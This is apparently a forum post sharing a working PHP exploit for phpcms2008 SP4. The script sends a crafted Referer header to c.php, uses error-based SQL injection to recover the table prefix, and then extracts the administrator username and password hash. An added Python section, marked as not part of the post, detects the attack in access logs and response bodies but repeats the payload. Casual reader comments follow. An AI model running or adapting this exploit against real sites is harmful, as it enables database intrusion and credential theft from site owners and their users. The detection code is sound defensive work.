phpcms2008 SP4 injection Exp (keeping my account: I'll post an exp too)
A while ago 情深哥哥 and 西毒二货 both posted one already.
In the spirit of learning, I wrote one of my own too...
```php
<?php
print_r ( "
+---------------------------------------+
title:phpcms2008 sp4 c.php exploit
mail:[email protected]
blog:www.moonhack.org
bbs:www.xinyues.org
date:2013.3.28
+---------------------------------------+\n
" );
if ($argc < 2) {
    print_r ( "
+---------------------------------------+
target:
php $argv[0] www.target.com
php $argv[0] www.target.com /phpcms2008/
+---------------------------------------+\n
" );
    exit ();
}
error_reporting ( E_ALL );
ini_set ( 'max_execution_time', '0' );

// Send one raw HTTP request over a socket and return the whole response.
function send_http($host, $prot, $referer) {
    $data = "";
    $fp = @fsockopen ( $host, $prot, $errno, $errstr, 30 );
    if (! $fp) {
        exit ( "$host Connection failed" );
    } else {
        fwrite ( $fp, $referer );
        while ( ! feof ( $fp ) ) {
            $data .= fgets ( $fp, 128 );
        }
        fclose ( $fp );
        return $data;
    }
}

$host = $argv [1];
$prot = "80";
$patch = isset ( $argv [2] ) ? $argv [2] : "";
$sql = "fuck'";

// Step 1: a lone quote in the Referer header makes c.php echo the failing
// INSERT statement, which reveals the table prefix.
$prefix = http ( $host, $prot, $sql, $patch );
function http($host, $prot, $sql, $patch) {
    $preg = '/INSERT INTO `(.*)ads_/';
    $prefix = '';
    $referer = "GET /$patch" . "c.php?id=1 HTTP/1.1\r\n";
    $referer .= "Host: $host\r\n";
    $referer .= "REFERER: $sql\r\n";
    $referer .= "Connection: Close\r\n\r\n";
    $data = send_http ( $host, $prot, $referer );
    preg_match ( $preg, $data, $prefix );
    if (! $prefix) {
        exit ( "fail\r\n" );
    }
    print ("prefix:$prefix[1]") ;
    return $prefix [1];
}

// Step 2: error-based injection through the same header; the result is read
// back out of the MySQL "Duplicate entry" error text echoed in the page.
$exp = http2 ( $host, $prot, $patch, $prefix );
function http2($host, $prot, $patch, $prefix) {
    $preg = '/\'~\'(.*):(.*)\'~1\'/';
    $sql2 = $sqlstring = "fuck'),('a','123','123','123',(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from " . $prefix . "member limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a))#";
    $referer = "GET /$patch" . "c.php?id=1 HTTP/1.1\r\n";
    $referer .= "Host: $host\r\n";
    $referer .= "REFERER: $sql2\r\n";
    $referer .= "Connection: Close\r\n\r\n";
    $data = send_http ( $host, $prot, $referer );
    preg_match ( $preg, $data, $exp );
    if (! $exp) {
        exit ( "fail\r\n" );
    }
    return $exp;
}

print_r ( "
success:$host
username:$exp[1]
password:$exp[2]
" );
?>
```
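Added example, not part of the original post: a defender-side check for the two things the script above depends on, an injected Referer header reaching c.php and a MySQL "Duplicate entry" error being echoed back to the client. The access-log lines and the error string are constructed, and the table prefix `phpcms_` is an assumption.

```python
"""Detect the Referer-header injection pattern used against phpcms2008 c.php.

Added example, not part of the forum post. The log lines and the response
body below are constructed; the table prefix "phpcms_" is an assumption.
"""
import re
import urllib.parse
from typing import Dict, List

# Combined log format: ip ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed copy of the exploit's second-stage Referer value (prefix assumed).
INJECTED_REFERER = (
    "x'),('a','123','123','123',(select 1 from(select count(*),"
    "concat((select (select (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) "
    "from phpcms_member limit 0,1)) from information_schema.tables limit 0,1),"
    "floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a))#"
)

# Constructed sample entries: two benign, two matching the exploit's requests.
SAMPLE_LOGS = [
    '203.0.113.5 - - [28/Mar/2013:10:00:01 +0800] "GET /c.php?id=1 HTTP/1.1" 200 512 "http://www.example.com/index.php" "Mozilla/5.0"',
    '203.0.113.7 - - [28/Mar/2013:10:00:02 +0800] "GET /c.php?id=1 HTTP/1.1" 500 873 "x\'" "-"',
    f'203.0.113.7 - - [28/Mar/2013:10:00:03 +0800] "GET /c.php?id=1 HTTP/1.1" 500 1201 "{INJECTED_REFERER}" "-"',
    '198.51.100.9 - - [28/Mar/2013:10:00:04 +0800] "GET /c.php?id=2 HTTP/1.1" 200 510 "http://www.example.com/list.php?catid=3" "Mozilla/5.0"',
]

# Indicators taken from the structure of the payload in the post above.
PATTERNS = [
    ("information_schema", re.compile(r"information_schema", re.I)),
    ("floor_rand", re.compile(r"floor\s*\(\s*rand\s*\(", re.I)),
    ("hex_concat", re.compile(r"concat\s*\(\s*0x", re.I)),
    ("trailing_comment", re.compile(r"(#|--\s|/\*)\s*$")),
    ("sql_keyword", re.compile(r"\b(select|union|insert)\b", re.I)),
]


def score_referer(referer: str) -> List[str]:
    """Return the injection indicators found in one Referer value (empty if clean)."""
    decoded = urllib.parse.unquote_plus(referer)
    hits = []
    # A real Referer is a URL; an odd number of single quotes is the stage-1 probe.
    if decoded.count("'") % 2 == 1:
        hits.append("unbalanced_quote")
    hits.extend(name for name, pat in PATTERNS if pat.search(decoded))
    return hits


def analyze_logs(lines: List[str]) -> List[Dict[str, object]]:
    """Parse access-log lines and return the entries whose Referer looks injected."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = score_referer(m.group("referer"))
        if hits:
            findings.append({
                "ip": m.group("ip"),
                "request": m.group("request"),
                "status": int(m.group("status")),
                "indicators": hits,
            })
    return findings


# The exploit reads credentials out of a MySQL "Duplicate entry" error shown in the
# page; the same '~'...'~1' marker tells a defender that error output reaches users.
LEAK_RE = re.compile(r"Duplicate entry '~'([^:']*):([^']*)'~1'")


def response_leaks_credentials(body: str) -> bool:
    """True if a response body carries the error-based extraction marker."""
    return LEAK_RE.search(body) is not None


if __name__ == "__main__":
    for finding in analyze_logs(SAMPLE_LOGS):
        print(finding)
    # Constructed error text; the hash is a placeholder, not a real value.
    sample_error = "Duplicate entry '~'admin:PLACEHOLDER_HASH'~1' for key 'group_key'"
    print(response_leaks_credentials(sample_error))
```

Run against a real log the two 500-status hits from one client, each with an injected Referer, are the sequence the script produces; seeing the duplicate-entry marker in any response body means database errors are being displayed and should be turned off regardless of whether the injection itself is patched.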
58 comments
Looks like I've seen this somewhere before.
The one over on 90 follows exactly the same rhythm; are accounts going to get deleted there too?
It would be even better with both the exp and the principle behind it.
Actually I was just joking, dammit.
Yeah, just joking, hehe.
I think I've seen this one~~~
I think I saw this a while ago!
The exploit code seems to be different~
They really are flying everywhere..
A while ago 情深哥哥 and 西毒二货 both posted it already.
Bro, this isn't original... no offense..
I just love the days when EXPs fly everywhere.
Damn! Today's exps are great.
phpcms2008?
Just started learning PHP, this looks a bit hard··
phpcms2008, learning the process of analyzing how the vulnerability was found.
Exps flying everywhere again, and now...
Heh, just farming replies,,,